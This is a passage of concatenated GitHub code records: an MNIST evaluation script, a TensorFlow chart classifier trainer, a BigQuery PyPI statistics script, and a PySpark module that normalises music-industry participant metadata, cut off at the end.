format_func=format_sel)\n pages[page](username, virtual, group)\n\n st.sidebar.title(\"About\")\n st.sidebar.info(\n \"\"\"\n The source code for this web app is available on [github]\n (https://github.com/samlaws/adventurers-log), please feel free to \n comment or make a pull request.\n \"\"\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"samlaws/adventurers-log","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26741807872","text":"# imports ---------------------------------------------------------------------#\nimport sys\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport argparse\nimport numpy as np \nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom PIL import Image\nfrom ema import EMA\nfrom datasets import MnistDataset\nfrom transforms import RandomRotation\nfrom models.modelM3 import ModelM3\nfrom models.modelM5 import ModelM5\nfrom models.modelM7 import ModelM7\n\ndef run(p_seed=0, p_kernel_size=5, p_logdir=\"temp\"):\n\n # enable GPU usage ------------------------------------------------------------#\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n if use_cuda == False:\n print(\"WARNING: CPU will be used for training.\")\n exit(0)\n\n # data loader -----------------------------------------------------------------#\n test_dataset = MnistDataset(training=False, transform=None)\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=100, shuffle=False)\n\n # model selection -------------------------------------------------------------#\n if(p_kernel_size == 3):\n model1 = ModelM3().to(device)\n elif(p_kernel_size == 5):\n model1 = ModelM5().to(device)\n elif(p_kernel_size == 7):\n model1 = ModelM7().to(device)\n\n 
model1.load_state_dict(torch.load(\"../logs/%s/model%03d.pth\"%(p_logdir,p_seed)))\n\n model1.eval()\n test_loss = 0\n correct = 0\n wrong_images = []\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(test_loader):\n data, target = data.to(device), target.to(device)\n output = model1(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n wrong_images.extend(np.nonzero(~pred.eq(target.view_as(pred)).cpu().numpy())[0]+(100*batch_idx))\n\n np.savetxt(\"../logs/%s/wrong%03d.txt\"%(p_logdir,p_seed), wrong_images, fmt=\"%d\")\n #print(len(wrong_images), wrong_images)\n\nif __name__ == \"__main__\":\n p = argparse.ArgumentParser()\n p.add_argument(\"--logdir\", default=\"modelM5\")\n p.add_argument(\"--seed\", default=0, type=int)\n p.add_argument(\"--trials\", default=30, type=int)\n p.add_argument(\"--kernel_size\", default=5, type=int)\n args = p.parse_args()\n for i in range(args.trials):\n run(p_seed = args.seed + i,\n p_kernel_size = args.kernel_size,\n p_logdir = args.logdir)\n\n\n\n\n","repo_name":"ansh941/MnistSimpleCNN","sub_path":"code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"54"} +{"seq_id":"12750523387","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 2 12:37:09 2023\n\n@author: kristencirincione\n\"\"\"\n\nfrom util.Data_Sources import train_images, min_width, min_height\nfrom util.convert_to_grayscale import convert_to_grayscale\nimport numpy as np\nfrom training.graph_classifier.build_model import build_model\nimport tensorflow as tf\n\n\nimg_resized = [img.resize_image(min_width, min_height) for img in train_images]\nimg_gray = [convert_to_grayscale(img) for img in img_resized]\n\nplot_type_map = {'scatter':0, 'line':1, 'dot':2, 'vertical_bar':3}\nY_plot_type = [img.plot_type for img in train_images]\nY_plot_type_mapped = [plot_type_map[plot_type] for plot_type in Y_plot_type]\n\nX = np.array(img_gray)\nY = np.array(Y_plot_type_mapped)\n\nsplit = int(len(X) * 0.8)\n\nX_train, Y_train = X[:split], Y[:split]\nX_val, Y_val = X[split:], Y[split:]\n\nmodel = build_model(input_shape=(None, min_width, min_height, 1))\n\nmodel.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\nhistory = model.fit(X_train, Y_train,\n epochs=10,\n batch_size=32,\n validation_data=(X_val, Y_val)\n)\n\nmodel.save('./training/graph_classifier/models/model_4.keras')","repo_name":"dojian/MLproject","sub_path":"Final_Project/training/graph_classifier/train_graph_classifier.py","file_name":"train_graph_classifier.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15502221221","text":"#!/usr/bin/env python3\n\n'''\nDownloads download statistics for a specific month, given as YYYY-MM.\n'''\n\nimport json\nfrom pathlib import Path\nimport sys\nfrom google.cloud import bigquery\n\n# pylint: disable=invalid-name\n\nif len(sys.argv) < 2 or \"-h\" in sys.argv or \"--help\" in sys.argv:\n print(\"Usage: {} YYYY-MM\".format(sys.argv[0]))\n sys.exit(1)\n\nmonth = sys.argv[1]\nassert month\n\nroot_dir = Path(__file__, '..', '..').resolve()\n\nclient = bigquery.Client.from_service_account_json(Path.home() / '.bigquery' / 'keys' / 
'bork-statistics.json')\n\nquery = Path(root_dir, 'queries', 'downloads-specific-month.sql').resolve().read_text()\nquery = query.replace('YYYY-MM', month)\n\nquery_job = client.query(query)\n\nresults = [{'version': row['version'], 'count': row['count']} for row in query_job]\nresults_json = json.dumps(results, indent=2)\n\nstart_date = next(iter(query_job))['start_date'].strftime('%Y-%m-%d')\nPath(root_dir, 'data', 'pypi', start_date + '.json').write_text(results_json)\n","repo_name":"duckinator/bork-statistics","sub_path":"bin/specific-month.py","file_name":"specific-month.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41571942031","text":"from pyspark.sql import DataFrame, SparkSession\nimport pyspark.sql.functions as f\nimport pyspark.sql.types as t\nimport typing as tp\n\n\nclass _TemplateRawParticipant:\n from ...schemas.proprietary_id import ProprietaryId as ProprietaryIdSchema\n from ...schemas.party_id import PartyId as PartyIdSchema\n from ...schemas.party_name import PartyName as PartyNameSchema\n from ...schemas.label_name import LabelName as LabelNameSchema\n from ...schemas.musical_work_contributor_role import MusicalWorkContributorRole as MusicalWorkContributorRoleSchema\n from ...schemas.artist_role import ArtistRole as ArtistRoleSchema\n from ...schemas.resource_contributor_role import ResourceContributorRole as ResourceContributorRoleSchema\n from ...enums import AttributeEnum, CustomFieldEnum\n\n source_schema = t.StructType([\n t.StructField(CustomFieldEnum.MessageRange.value, t.StringType(), False),\n t.StructField(CustomFieldEnum.TenantName.value, t.StringType(), False),\n t.StructField(\"ResourceReference\", t.StringType(), True),\n t.StructField(\"ProprietaryId\", ProprietaryIdSchema, True),\n t.StructField(\"PartyId\", PartyIdSchema, True),\n t.StructField(\"PartyName\", PartyNameSchema, True),\n t.StructField(\"LabelName\", LabelNameSchema, True),\n t.StructField(\"Nationality\", t.ArrayType(t.StringType(), True), True),\n t.StructField(\"IndirectResourceContributorRole\", MusicalWorkContributorRoleSchema, True),\n t.StructField(\"ArtistRole\", ArtistRoleSchema, True),\n t.StructField(\"ResourceContributorRole\", ResourceContributorRoleSchema, True),\n t.StructField(AttributeEnum.SequenceNumber.value, t.IntegerType(), True)\n ])\n\n target_schema = t.StructType([\n t.StructField(CustomFieldEnum.MessageRange.value, t.StringType(), False),\n t.StructField(CustomFieldEnum.TenantName.value, t.StringType(), False),\n t.StructField(\"ResourceReference\", t.StringType(), True),\n t.StructField(\"IsDPID\", t.BooleanType(), True),\n t.StructField(\"DPID\", t.StringType(), True),\n t.StructField(\"IsISNI\", t.BooleanType(), True),\n t.StructField(\"ISNI\", t.StringType(), True),\n t.StructField(\"AbbreviatedName\", t.StringType(), True),\n t.StructField(\"FullName\", t.StringType(), False),\n t.StructField(\"FullNameAsciiTranscribed\", t.StringType(), True),\n t.StructField(\"FullNameIndexed\", t.StringType(), True),\n t.StructField(\"KeyName\", t.StringType(), True),\n t.StructField(\"NamesAfterKeyName\", t.StringType(), True),\n t.StructField(\"NamesBeforeKeyName\", t.StringType(), True),\n t.StructField(\"LabelName\", t.StringType(), True),\n t.StructField(\"CompanyName\", t.StringType(), True),\n t.StructField(\"CompanyAddress\", t.StringType(), True),\n t.StructField(\"Nationality\", t.ArrayType(t.StringType(), True), True),\n t.StructField(\"Role\", 
t.StringType(), False),\n t.StructField(\"SequenceNumber\", t.IntegerType(), True),\n t.StructField(\"ProprietaryDPID\", t.StringType(), True),\n t.StructField(\"ProprietaryCode\", t.StringType(), True),\n t.StructField(f\"ProprietaryViId\", t.StringType(), True),\n t.StructField(\"ProprietaryCompanyName\", t.StringType(), True),\n t.StructField(\"ProprietaryCompanyAddress\", t.StringType(), True),\n t.StructField(\"Type\", t.StringType(), False)\n ])\n\n def __init__(\n self,\n tenant_path: str,\n fields_to_preprocess: tp.List[str],\n valid_source_fields: tp.List[str],\n participant_type: str,\n is_main_release: bool = False,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n relative_source_path: tp.Optional[str] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import CustomFieldEnum\n\n if CustomFieldEnum.MessageRange.value not in fields_to_preprocess:\n fields_to_preprocess.append(CustomFieldEnum.MessageRange.value)\n\n if CustomFieldEnum.TenantName.value not in fields_to_preprocess:\n fields_to_preprocess.append(CustomFieldEnum.TenantName.value)\n\n if CustomFieldEnum.MessageRange.value not in valid_source_fields:\n valid_source_fields.append(CustomFieldEnum.MessageRange.value)\n\n if CustomFieldEnum.TenantName.value not in valid_source_fields:\n valid_source_fields.append(CustomFieldEnum.TenantName.value)\n\n for field_name in valid_source_fields:\n if field_name not in self.source_schema.fieldNames():\n raise ValueError(\n \"Valid Source Fields Error: At least one source field is not included at source schema.\"\n )\n\n if (config is None) and (config_file is None):\n raise ValueError(\"Config Error: At least config or config_file input arguments must be specified.\")\n\n if (specification_file is None) and (input_file is None):\n raise ValueError(\"File Error: At least specification_file or input_file input arguments must be specified.\")\n\n self._spark: SparkSession = spark if spark else SparkSession.getActiveSession()\n self._tenant_path: str = tenant_path\n self._relative_source_path: str = relative_source_path\n self._specification_file: tp.Optional[str] = specification_file\n self._input_file: tp.Optional[tp.Union[str, tp.List[str]]] = input_file\n self._is_main_release: bool = is_main_release\n self._config: tp.Optional[tp.Dict[str, tp.Any]] = config\n self._config_file: tp.Optional[str] = config_file\n self._source_df: tp.Optional[DataFrame] = None\n self._fields_to_preprocess: tp.List[str] = fields_to_preprocess\n self._valid_source_fields: tp.List[str] = valid_source_fields\n self._participant_type: str = participant_type\n self._target_df: tp.Optional[DataFrame] = None\n\n @property\n def relative_source_path(self) -> str:\n return self._relative_source_path\n\n @relative_source_path.setter\n def relative_source_path(self, path: str) -> tp.NoReturn:\n self._relative_source_path = path\n\n @property\n def specification_file(self) -> tp.Optional[str]:\n return self._specification_file\n\n @property\n def input_file(self) -> tp.Optional[tp.List[str]]:\n if isinstance(self._input_file, str):\n return [self._input_file]\n else:\n return self._input_file\n\n @property\n def source_df(self) -> DataFrame:\n return self._source_df\n\n @source_df.setter\n def source_df(self, source_df: tp.Optional[DataFrame] = None) -> tp.NoReturn:\n from dependencies.utils import get_table_path\n from ...functions 
import filter_release_by_type, filter_by_release, filter_by_input_file\n from ...enums import CustomFieldEnum\n\n if not source_df:\n path = get_table_path(\n self._tenant_path, self.relative_source_path,\n partition_name=CustomFieldEnum.SpecificationFileName.value, partition_value=self.specification_file\n )\n print(f\"Reading source data from {path}.\")\n source_df = self._spark.read.parquet(path)\n\n if self.specification_file is None and self.input_file is not None:\n source_df = filter_by_input_file(source_df, self.input_file, spark=self._spark)\n\n source_df = filter_release_by_type(\n resource=source_df,\n release_type_flag=\"IsSoundRecordingType\",\n config=self._config,\n config_file=self._config_file\n )\n source_df = filter_by_release(df=source_df, main=self._is_main_release)\n\n self._source_df = source_df\n\n @property\n def target_df(self) -> DataFrame:\n return self._target_df\n\n def _preprocess(self) -> tp.NoReturn:\n from ...enums import AttributeEnum\n\n if self.source_df:\n field_error_count = 0\n for field_name in self._fields_to_preprocess:\n field_parts = field_name.split(\".\")\n if 1 <= len(field_parts) < 3:\n if (len(field_parts) == 1) or (\"*\" in field_name):\n assert field_parts[0] in self.source_df.schema.fieldNames()\n else:\n field_error_count += 1\n else:\n field_error_count += 1\n\n if field_error_count:\n raise ValueError(\"Field Names Error: At least one field name could not be parsed.\")\n else:\n print(f\"Start pre-processing of {self._participant_type}.\")\n source_df = self._source_df.select(*self._fields_to_preprocess)\n for field_name in self.source_schema.fieldNames():\n if field_name not in source_df.schema.fieldNames():\n source_df = source_df.withColumn(\n field_name,\n (f.lit(0) if field_name == AttributeEnum.SequenceNumber.value else f.lit(None))\n .astype(self.source_schema[field_name].dataType)\n )\n else:\n if field_name in self._valid_source_fields:\n if field_name != \"Nationality\" \\\n and isinstance(source_df.schema[field_name].dataType, t.ArrayType):\n mapping = f.explode_outer(field_name)\n else:\n mapping = f.col(field_name).astype(self.source_schema[field_name].dataType)\n else:\n mapping = f.lit(None).astype(self.source_schema[field_name].dataType)\n\n source_df = source_df.withColumn(field_name, mapping)\n\n self._source_df = source_df.select(*self.source_schema.fieldNames())\n else:\n raise ValueError(\"Source DataFrame Error: source_df must be first loaded.\")\n\n def _process(self) -> tp.NoReturn:\n from dependencies.readers.lookup import LookUpDpidList\n from ...functions.column_utils import \\\n is_dpid_mapping, dpid_mapping, \\\n is_isni_mapping, isni_mapping, \\\n value_mapping, user_defined_value_mapping\n from ...schemas.party_name import PartyName as PartyNameSchema\n from ...enums import AttributeEnum, RawParticipantEnum\n\n print(f\"Start processing of {self._participant_type}.\")\n target_df = self.source_df\n\n null_role_condition = (\n (f.col(\"IndirectResourceContributorRole\").isNull())\n & (f.col(\"ResourceContributorRole\").isNull())\n & (f.col(\"ArtistRole\").isNull())\n )\n\n # noinspection PyProtectedMember\n target_df = target_df \\\n .withColumn(\n \"IsDPID\",\n f.coalesce(\n is_dpid_mapping(\"PartyId\", mapped_from_field=True),\n f.when(\n f.col(\"PartyId\").isNotNull(), is_dpid_mapping(\"PartyId\", mapped_from_field=False)\n ).otherwise(\n f.when(null_role_condition, is_dpid_mapping(\"ProprietaryId\", mapped_from_field=False))\n )\n )\n ) \\\n .withColumn(\n \"DPID\",\n f.when(\n 
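                # DPID: prefer PartyId when present; otherwise fall back to ProprietaryId,
                # but only when all three role fields are null (null_role_condition).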
f.col(\"PartyId\").isNotNull(), dpid_mapping(\"PartyId\", from_namespace=False)\n ).otherwise(\n f.when(null_role_condition, dpid_mapping(\"ProprietaryId\", from_namespace=False))\n )\n ) \\\n .withColumn(\n \"IsISNI\",\n f.coalesce(\n is_isni_mapping(\"PartyId\", mapped_from_field=True),\n f.when(\n f.col(\"PartyId\").isNotNull(), is_isni_mapping(\"PartyId\", mapped_from_field=False)\n ).otherwise(\n f.when(null_role_condition, is_isni_mapping(\"ProprietaryId\", mapped_from_field=False))\n )\n )\n ) \\\n .withColumn(\n \"ISNI\",\n f.when(\n f.col(\"PartyId\").isNotNull(), isni_mapping(\"PartyId\")\n ).otherwise(\n f.when(null_role_condition, isni_mapping(\"ProprietaryId\"))\n )\n )\n\n for field in PartyNameSchema.fields:\n # noinspection PyProtectedMember\n target_df = target_df.withColumn(\n field.name,\n f.col(f\"PartyName.{field.name}\") if isinstance(field.dataType, t.StringType)\n else f.col(f\"PartyName.{field.name}\")._VALUE\n )\n target_df = target_df.drop(f.col(AttributeEnum.LanguageAndScriptCode.value))\n\n # noinspection PyProtectedMember\n target_df = target_df.withColumn(\"LabelName\", user_defined_value_mapping(\"LabelName\"))\n\n target_df = target_df.withColumn(\"Nationality\", f.coalesce(f.col(\"Nationality\"), f.array()))\n\n dpid_list = LookUpDpidList(spark=self._spark, config=self._config, config_file=self._config_file)\n dpid_list = dpid_list.drop(f.col(AttributeEnum.SequenceNumber.value))\n\n target_df = target_df.join(dpid_list, on=[\"DPID\"], how=\"left\") \\\n .withColumnRenamed(\"Address\", \"CompanyAddress\")\n\n # noinspection PyProtectedMember\n target_df = target_df.withColumn(\n \"Role\",\n f.when(\n f.col(\"IndirectResourceContributorRole\").isNotNull(),\n user_defined_value_mapping(\"IndirectResourceContributorRole\")\n ).otherwise(\n f.when(\n f.col(\"ArtistRole\").isNotNull(), user_defined_value_mapping(\"ArtistRole\")\n ).otherwise(\n f.when(\n f.col(\"ResourceContributorRole\").isNotNull(),\n user_defined_value_mapping(\"ResourceContributorRole\")\n ).otherwise(\n f.lit(self._participant_type)\n if not self._participant_type.endswith(\"Label\") else f.lit(\"Label\")\n )\n )\n )\n )\n\n roles_included = any(fieldname.endswith(\"Role\") for fieldname in self._valid_source_fields)\n sent_on_behalf_of_included = any(\n fieldname.startswith(RawParticipantEnum.SentOnBehalfOf.value) for fieldname in self._fields_to_preprocess\n )\n proprietary_id_included = \"ProprietaryId\" in self._valid_source_fields\n role_flag = (roles_included or sent_on_behalf_of_included) and proprietary_id_included\n if role_flag:\n # noinspection PyProtectedMember\n target_df = target_df \\\n .withColumn(\"ProprietaryDPID\", dpid_mapping(\"ProprietaryId\", from_namespace=True)) \\\n .withColumn(\"ProprietaryCode\", isni_mapping(\"ProprietaryId\")) \\\n .withColumn(\n f\"ProprietaryViId\",\n f.when(\n (~is_dpid_mapping(\"ProprietaryId\", mapped_from_field=False))\n & (~is_isni_mapping(\"ProprietaryId\", mapped_from_field=False)),\n value_mapping(\"ProprietaryId\")\n )\n )\n\n dpid_list = dpid_list \\\n .withColumnRenamed(\"DPID\", \"ProprietaryDPID\") \\\n .withColumnRenamed(\"CompanyName\", \"ProprietaryCompanyName\") \\\n .withColumnRenamed(\"Address\", \"ProprietaryCompanyAddress\")\n\n target_df = target_df.join(dpid_list, on=[\"ProprietaryDPID\"], how=\"left\")\n else:\n target_df = target_df \\\n .withColumn(\"ProprietaryDPID\", f.lit(None)) \\\n .withColumn(\"ProprietaryCode\", f.lit(None)) \\\n .withColumn(f\"ProprietaryViId\", f.lit(None)) \\\n 
.withColumn(\"ProprietaryCompanyName\", f.lit(None)) \\\n .withColumn(\"ProprietaryCompanyAddress\", f.lit(None))\n\n self._target_df = target_df\n\n def _postprocess(self) -> tp.NoReturn:\n if self.target_df:\n print(f\"Starting post-processing of {self._participant_type}.\")\n target_df = self.target_df\n for field_name in self.target_schema.fieldNames():\n if field_name not in self.target_df.schema.fieldNames():\n if field_name == \"Type\":\n target_df = target_df.withColumn(\n field_name,\n f.lit(self._participant_type).astype(self.target_schema[field_name].dataType)\n )\n elif field_name == \"SequenceNumber\":\n target_df = target_df.withColumnRenamed(f\"_{field_name}\", field_name)\n else:\n target_df = target_df.withColumn(\n field_name,\n f.lit(None).astype(self.target_schema[field_name].dataType)\n )\n else:\n continue\n target_df = target_df.na.fill({\"SequenceNumber\": 0})\n\n target_df = target_df.select(*self.target_schema.fieldNames())\n\n self._target_df = target_df\n else:\n raise ValueError(\"Target DataFrame Error: target_df must be first processed.\")\n\n def persist(self, source_df: tp.Optional[DataFrame] = None):\n self.source_df = source_df\n self._preprocess()\n self._process()\n self._postprocess()\n\n def unpersist(self) -> tp.NoReturn:\n self.source_df.unpersist()\n self.target_df.unpersist()\n\n\nclass _MessagingParty(_TemplateRawParticipant):\n def __init__(\n self,\n messaging_party_tag: str,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_RELEASES\n\n self.messaging_party_tag = messaging_party_tag\n super(_MessagingParty, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=[f\"{self.messaging_party_tag}.*\"],\n valid_source_fields=[\"PartyId\", \"PartyName\"],\n participant_type=self.messaging_party_tag,\n is_main_release=True,\n spark=spark,\n relative_source_path=MESSAGE_RELEASES,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.message_header import MessageHeader\n\n if isinstance(MessageHeader[self.messaging_party_tag].dataType, t.ArrayType):\n self._source_df = self._source_df \\\n .withColumn(self.messaging_party_tag, f.explode_outer(f.col(self.messaging_party_tag)))\n\n super(_MessagingParty, self)._preprocess()\n\n\nclass _MessageRecipient(_MessagingParty):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import MessageHeaderEnum\n super(_MessageRecipient, self).__init__(\n messaging_party_tag=MessageHeaderEnum.MessageRecipient.value,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _MessageSender(_MessagingParty):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: 
tp.Optional[str] = None\n ) -> None:\n from ...enums import MessageHeaderEnum\n super(_MessageSender, self).__init__(\n messaging_party_tag=MessageHeaderEnum.MessageSender.value,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SentOnBehalfOf(_MessagingParty):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import MessageHeaderEnum\n\n super(_SentOnBehalfOf, self).__init__(\n messaging_party_tag=MessageHeaderEnum.SentOnBehalfOf.value,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.proprietary_id import ProprietaryId\n from ...schemas.party_id import PartyId\n from ...enums import AttributeEnum\n\n super(_MessagingParty, self)._preprocess()\n\n # noinspection PyProtectedMember\n self._source_df = self._source_df \\\n .withColumn(\n \"ProprietaryId\",\n f.struct(\n f.col(\"PartyId\")._Namespace\n .astype(ProprietaryId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.col(\"PartyId\")._VALUE\n .astype(ProprietaryId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value)\n )\n ) \\\n .withColumn(\n \"PartyId\",\n f.struct(\n f.lit(None)\n .astype(PartyId[AttributeEnum.IsDPID.value].dataType)\n .alias(AttributeEnum.IsDPID.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.IsISNI.value].dataType)\n .alias(AttributeEnum.IsISNI.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value)\n )\n )\n\n self._valid_source_fields.append(\"ProprietaryId\")\n\n\nclass _SentOnBehalfOfProprietary(_TemplateRawParticipant):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_RELEASES\n from ...enums import MessageHeaderEnum\n\n super(_SentOnBehalfOfProprietary, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=[f\"{MessageHeaderEnum.SentOnBehalfOf.value}.*\"],\n valid_source_fields=[\"PartyId\"],\n participant_type=\"SentOnBehalfOfProprietary\",\n is_main_release=True,\n spark=spark,\n relative_source_path=MESSAGE_RELEASES,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.party_id import PartyId\n from ...enums import AttributeEnum\n\n super(_SentOnBehalfOfProprietary, self)._preprocess()\n\n # noinspection PyProtectedMember\n self._source_df = self._source_df \\\n .where(f.col(\"PartyId\")._Namespace.isNotNull()) \\\n .withColumn(\n \"PartyId\",\n f.struct(\n f.lit(True)\n .astype(PartyId[AttributeEnum.IsDPID.value].dataType)\n .alias(AttributeEnum.IsDPID.value),\n f.lit(None)\n 
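# Illustrative sketch, not part of the original module: the _preprocess
# override below rebuilds struct columns with f.struct(...).alias(...),
# moving PartyId's namespace/value into a fresh ProprietaryId struct and
# nulling PartyId out. A toy version of that struct-rebuild idiom (the
# two-field schema is an assumption for the demo):
from pyspark.sql import SparkSession
import pyspark.sql.functions as f
import pyspark.sql.types as t

spark = SparkSession.builder.master("local[1]").getOrCreate()
schema = t.StructType([t.StructField("PartyId", t.StructType([
    t.StructField("Namespace", t.StringType()),
    t.StructField("Value", t.StringType()),
]))])
df = spark.createDataFrame([(("DPID", "PADPIDA2014"),)], schema)
df = df.withColumn(
    "ProprietaryId",
    f.struct(
        f.col("PartyId.Namespace").alias("Namespace"),
        f.col("PartyId.Value").alias("Value"),
    ),
).withColumn(
    "PartyId",
    f.struct(f.lit(None).cast("string").alias("Namespace"),
             f.lit(None).cast("string").alias("Value")),
)
df.printSchema()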
.astype(PartyId[AttributeEnum.IsISNI.value].dataType)\n .alias(AttributeEnum.IsISNI.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.col('PartyId')._Namespace\n .astype(PartyId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value),\n )\n )\n\n\nclass _ResourceOrReleaseProprietary(_TemplateRawParticipant):\n def __init__(\n self,\n id_tag: str,\n has_resource_reference: bool,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_SOUND_RECORDINGS, MESSAGE_RELEASES\n from ...enums import SoundRecordingEnum\n\n if has_resource_reference:\n fields_to_preprocess = [SoundRecordingEnum.ResourceReference.value, f\"{id_tag}.*\"]\n valid_source_fields = [SoundRecordingEnum.ResourceReference.value, \"ProprietaryId\"]\n is_main_release = False\n relative_source_path = MESSAGE_SOUND_RECORDINGS\n else:\n fields_to_preprocess = [f\"{id_tag}.*\"]\n valid_source_fields = [\"ProprietaryId\"]\n is_main_release = True\n relative_source_path = MESSAGE_RELEASES\n participant_type = f\"{id_tag.replace('Id', '')}Proprietary\"\n\n self.id_tag = id_tag\n self.has_resource_reference = has_resource_reference\n super(_ResourceOrReleaseProprietary, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=fields_to_preprocess,\n valid_source_fields=valid_source_fields,\n participant_type=participant_type,\n is_main_release=is_main_release,\n spark=spark,\n relative_source_path=relative_source_path,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.party_id import PartyId\n from ...schemas.proprietary_id import ProprietaryId\n from ...enums import AttributeEnum\n\n self._source_df = self._source_df \\\n .withColumn(self.id_tag, f.explode_outer(f.col(self.id_tag))) \\\n .where(f.col(self.id_tag).isNotNull())\n\n super(_ResourceOrReleaseProprietary, self)._preprocess()\n\n # noinspection PyProtectedMember\n self._source_df = self._source_df \\\n .withColumn(\n \"PartyId\",\n f.struct(\n f.lit(True).astype(PartyId[AttributeEnum.IsDPID.value].dataType).alias(AttributeEnum.IsDPID.value),\n f.lit(False).astype(PartyId[AttributeEnum.IsISNI.value].dataType).alias(AttributeEnum.IsISNI.value),\n f.lit(None).astype(PartyId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.col(\"ProprietaryId\")._Namespace.astype(PartyId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value),\n ).alias(\"PartyId\")\n ) \\\n .withColumn(\n \"ProprietaryId\",\n f.struct(\n f.lit(None).astype(ProprietaryId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.lit(None).astype(ProprietaryId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value),\n )\n )\n\n self._valid_source_fields.pop(self._valid_source_fields.index(\"ProprietaryId\"))\n self._valid_source_fields.append(\"PartyId\")\n\n\nclass _IndirectSoundRecordingProprietary(_ResourceOrReleaseProprietary):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: 
